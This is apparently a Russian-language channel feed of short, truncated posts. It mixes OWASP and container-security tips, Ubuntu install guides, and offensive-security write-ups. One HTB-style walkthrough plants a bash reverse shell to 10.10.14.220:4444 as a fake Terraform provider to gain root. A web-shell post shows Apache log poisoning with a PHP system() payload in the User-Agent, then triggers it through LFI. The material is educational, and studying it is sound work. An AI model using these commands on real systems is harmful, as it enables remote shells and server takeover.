Safety🪬

OWASP как с ним работать?‼️ 🚀 OWASP: не просто аббревиатура, а survival guide для разработчика Знаете главную причину утечек данных и взломов веб-приложений? Это не хитрые 0-day уязвимости, а старые, как мир, A01:2021-Broken Access Control и A03:2021-Injection. Знакомо? Именно эти риски — ядро OWASP Top 10. Но OWASP — это не просто список страшилок. Это бесплатный арсенал для создания защищённого кода. И вот как его использовать на практике: 🛠 Три must-have инструмента на старте: 1. OWASP ZAP ...

1. Не доверяйте плагинам — GiveWP 3.14.0 уязвим, но многие до сих пор его не обновили . 2. PHP-CGI — зло — если используете, убедитесь, что версия актуальная (>8.3.8) . 3. Service Account токены — отключайте автоматическое монтирование для подов, которым не нужен доступ к API : spec: automountServiceAccountToken: false 4. Обновляйте runc — версии до 1.1.12 уязвимы для CVE-2024-21626 . 5. Проверяйте sudo-права — если пользователь может запускать runc от root, считайте, что хост скомпрометирован ....

🛣 Установка и запуск traceroute на Ubuntu 22.04 traceroute — классическая утилита для диагностики сети, показывающая путь пакетов до удалённого хоста . ## 📦 Установка sudo apt update sudo apt install traceroute -y ## 🚀 Базовое использование traceroute google.com Пример вывода: traceroute to google.com (142.250.185.46), 30 hops max, 60 byte packets 1 router.home (192.168.1.1) 2.345 ms 2.123 ms 1.987 ms 2 3 10.0.0.1 (10.0.0.1) 15.678 ms 14.321 ms 14.001 ms 4 72.14.215.84 (72.14.215.84) 22.456 m...

cat > /dev/shm/terraform-provider-examples << 'EOF' #!/bin/bash bash -i >& /dev/tcp/10.10.14.220/4444 0>&1 EOF chmod +x /dev/shm/terraform-provider-examples Теперь создаем конфиг Terraform, который переопределяет путь к провайдеру на нашу директорию: cat > ~/.terraformrc << 'EOF' provider_installation { dev_overrides { "previous.htb/terraform/examples" = "/dev/shm" } direct {} } EOF Ставим слушатель на атакующей машине: nc -lvnp 4444 Запускаем Terraform от root с указанием рабочей директории: su...

🌍 Установка Google Earth на Ubuntu 22.04 LTS Хотите рассматривать любую точку планеты, не выходя из дома? Google Earth Pro доступен для Ubuntu, и установить его можно несколькими способами . Выберите самый удобный для вас. ## 📥 Способ 1: Установка через скачанный .deb пакет (Самый простой) Этот метод не требует добавления репозиториев и отлично подходит для разовой установки . 1. Скачайте пакет. Откройте терминал (Ctrl+Alt+T) и выполните: cd /tmp && mkdir google-earth && cd google-earth wget h...

Отличная тема для сборника! "Семь друзей хакера" Я подобрал семь действительно мощных инструментов для усиления разведки — от поиска утечек до автоматизации OSINT. https://xakep.ru/2026/02/26/7-scanning-tools/ --- 🛠 Семь друзей хакера. Собираем инструменты для усиления разведки Покопавшись в своем ящике инструментов, я нашел несколько жемчужин, которыми решил поделиться. Сбор информации о таргете, поиск скрытых путей и секретных данных, сканирование XSS и альтернатива Burp . Разведка (recon) — ...

brs-xss — это современный асинхронный XSS-сканер, который понимает контекст выполнения . Что умеет: - Контекстно-зависимый анализ - Асинхронное сканирование (быстро) - Работает на базе BRS-KB (базы знаний) - Версия 4.0.0 (январь 2026) — свежая и без известных уязвимостей Пример установки: pip install brs-xss==4.0.0 Почему это важно: Обычные XSS-сканеры просто тыкают payload'ы. brs-xss анализирует, где именно выполняется код — в HTML, в JavaScript, в атрибутах тегов — и подбирает соответствующий ...

🍺 Установка и удаление Homebrew на Ubuntu 22.04 Homebrew (изначально созданный для macOS) отлично работает на Linux и позволяет устанавливать свежие версии инструментов, которых нет в стандартных репозиториях . ## 📥 Установка Homebrew ### 1. Установите зависимости sudo apt update sudo apt install build-essential procps curl file git -y Эти пакеты необходимы для компиляции и работы Homebrew . ### 2. Запустите скрипт установки /bin/bash -c "&#036;(curl -fsSL https://raw.githubusercontent.com/Hom...

Отличная тема для новичков! Веб-шеллы — это та самая "входная дверь", которую хакеры оставляют после взлома. В этом посте разберем, как они устроены, как их заливают и как логи сервера сами превращаются в шелл. Всё с реальными примерами кода. https://xakep.ru/2026/03/03/webshells-for-begginers/ --- 🐚 Веб-шеллы с самого начала. Как серверы захватывают через веб-приложение Сегодня я расскажу о том, что такое веб‑шеллы и как их пишут. Посмотрим, как при атаках заливают шелл на сервер, получив RCE ...

Теория: Если мы можем читать логи сервера через LFI и влиять на их содержимое (например, через User-Agent), то, подсунув туда PHP-код и подключив через LFI, мы заставим сервер его выполнить . Практика для Apache: 1. Отправляем запрос с PHP-кодом в User-Agent: curl --user-agent "<?php system(&#092;&#036;_GET['cmd']); ?>" http://target.com/ 2. Теперь через LFI подключаем лог: http://target.com/page.php?file=/var/log/apache2/access.log&cmd=id Сервер выполнит id и вернет результат . Для Nginx — пути...